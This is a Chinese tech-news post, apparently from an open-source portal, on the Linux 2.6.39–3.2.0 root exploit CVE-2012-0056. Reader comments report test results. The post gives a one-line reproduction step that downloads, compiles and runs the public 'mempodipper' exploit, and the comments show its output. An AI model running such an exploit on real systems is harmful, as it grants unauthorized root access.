|
||
| 找到您想要的开源软件,分享和交流 | Android客户端 iPhone客户端 开源软件 资讯 | |
Linux 2.6.39 到 3.2.0 爆提权漏洞
Linux 2.6.39 到 3.2.0 内核爆提权漏洞,普通用户可以通过运行特定代码获得 root 权限。
重现方法: wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c cc mempodipper.c ./a.out
在执行完毕后运行 whoami 来看是否执行成功。
已知发行版情况:
如果你测试了,请将测试结果告诉我们!注意告诉我们发行版和 uname -a 的结果。
我机子上测试成功了 =============================== Ubuntu11.10 Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
|
本周推荐 CodeMirror
CodeMirror 是一款“Online Source Editor”,基于Javascript,短小精悍,实时在线代码高亮显示,它不是某个富文本编辑器的附属产品,它是许多大名鼎鼎的在线代码编辑器的基础库。
显示全部Linux Kernel的其他资讯
本周热点资讯
本站最新资讯
|
回到顶部 发表评论 网友评论,共 36 条
引用来自“影子明”的评论
说 你 安全 我 笑了 有群白痴 把你 当 宝 一样捧着
Linux panquanyi-1 2.6.32-36-generic #79-Ubuntu SMP Tue Nov 8 22:29:53 UTC 2011 x86_64 GNU/Linux
ubuntu11.10 成功
Linux panquanyi-3 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
/tmp/ccvzti9n.o(.text+0x1c8): In function `ptrace_address':
: undefined reference to `pipe2'
collect2: ld returned 1 exit status
2.6.26-2-amd64
cc mempodipper.c
/tmp/ccUiQVi6.o: In function `ptrace_address':
mempodipper.c:(.text+0x23b): undefined reference to `pipe2'
collect2: ld returned 1 exit status
/tmp/ccvzti9n.o(.text+0x1c8): In function `ptrace_address':
: undefined reference to `pipe2'
collect2: ld returned 1 exit status
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
到这没反映了。需要等多长时间?
失败